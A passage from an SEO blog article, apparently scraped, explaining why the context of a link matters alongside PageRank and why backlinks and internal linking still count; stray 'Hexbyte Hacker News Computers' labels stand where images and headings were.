Learn more about finding and fixing these issues here.

3. Don’t get blinded by “authority;” context matters too

PageRank is important, but so is the context of a link.

What do I mean by this? Imagine that you run a cat blog, and you write a blog post about how your cat has scratched the seats of your beautiful new BMW. In the post, you link to a relevant product page on the official BMW website. Is this link irrelevant because it comes from a cat blog?

No. It’s still perfectly legit and relevant. However, it may have less “value” in the eyes of Google than a link from a well‐known auto blogger, who wrote an entire article about that particular BMW model.

In all honesty, if I had to choose which of these two pages would provide the best link for BMW

Hexbyte  Hacker News  Computers bmw link

Hexbyte  Hacker News  Computers bmw cat link

… I would have a seriously hard time deciding.

Sidenote.

These two pages aren’t real. I made them up. 🙂

Hexbyte Hacker News Computers Final thoughts

Most SEOs never think about Google PageRank for obvious reasons: it’s old, and there’s no way to see the PageRank for a page anymore, even if you wanted to.

But it’s important to remember that the PageRank formula is at the heart of many of today’s SEO best practices. It’s the reason why backlinks matter, and it’s why SEO professionals still pay so much attention to internal linking.

That’s not to say that you should obsess over, or even try to optimize for PageRank directly. You shouldn’t. But understand that whenever you build links, work on your internal linking structure, or vet your external links. What you’re actually doing is indirectly optimizing for PageRank.

Read More